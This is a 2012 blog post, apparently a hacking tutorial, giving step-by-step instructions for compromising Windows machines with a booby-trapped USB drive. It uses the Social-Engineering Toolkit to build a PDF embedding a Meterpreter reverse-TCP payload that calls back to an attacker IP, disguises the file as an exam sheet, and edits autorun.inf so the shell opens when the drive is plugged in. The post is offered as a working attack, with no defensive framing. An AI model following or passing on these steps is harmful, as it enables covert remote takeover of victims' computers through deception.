Saturday, December 29, 2012

Remote System Hacking using USB + pdf Reader attack

Remote System Hacking using Autorun.inf file 
In this attack we use the autorun.inf file to establish the connection without clicking the file 

Requirement :
Attacker : Backtrack
Victim : windows xp , windows 7  having pdf reader or comparable vulnerable software like ms-office or etc

Step 1 : go to the social engineering toolkit using 
cd /pentest/exploits/set
./set




  Step 2 : select the Social-Engineering Attacks by selecting 1

Step 3 : Select Infectious Media Generator by selecting option 3

Infectious Media Generation generate a autorun.inf file and a metasploit payload and these files can be copied into the USB/DVD/CD as the victim open the USB the payloads runs automatically .

Step 4 : select 1 for file-format exploits

here is the list of payloads you can select the payloads as per your requirements here i am using 11 adobe pdf Embedded EXE Social Engineering .

 Step 5 : select 1 for use your own PDF for Attack

 Now enter the path to pdf file  as /home/exam-sheet.pdf (file name as exam-sheet.pdf )

Step 6 : select 2 for windows/meterpreter/reverse_tcp 

Step 7 : IP address for listener attacker machine IP here my system address will be 192.168.56.101 and select Port to connect as port 80 which provides us the reverse connection using this port .
Step 8 : here we need to edit the autorun.inf  file here go to the directory of autorun where our both files payload file & autorun file
follow the following steps to edit & rename our files
  • open new terminal and type 
            ls -al /pentest/exploits/set/autorun/ we can see two files here one is autorun file   and other is template
  • Now go to the directory cd /pentest/exploits/set/autorun
            cd /pentest/exploits/set/autorun : ls  (to see all files in the directory)
  • type nano autorun.inf (it will open a nano editor for editing autorun.inf file here give the name of your file which you want to open by plugin the USB here i gives the name as            exame-sheet.pdf)
  • for changing the name of the file type mv template.pdf exame-sheet.pdf
  • copy these both files into our usb drives 
As we plugins the usb in the victim system the meterpreter sessions will opens 
we can list the open sessions by typing sessions -l commands & for connecting the sessions type sessions -i 1 

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)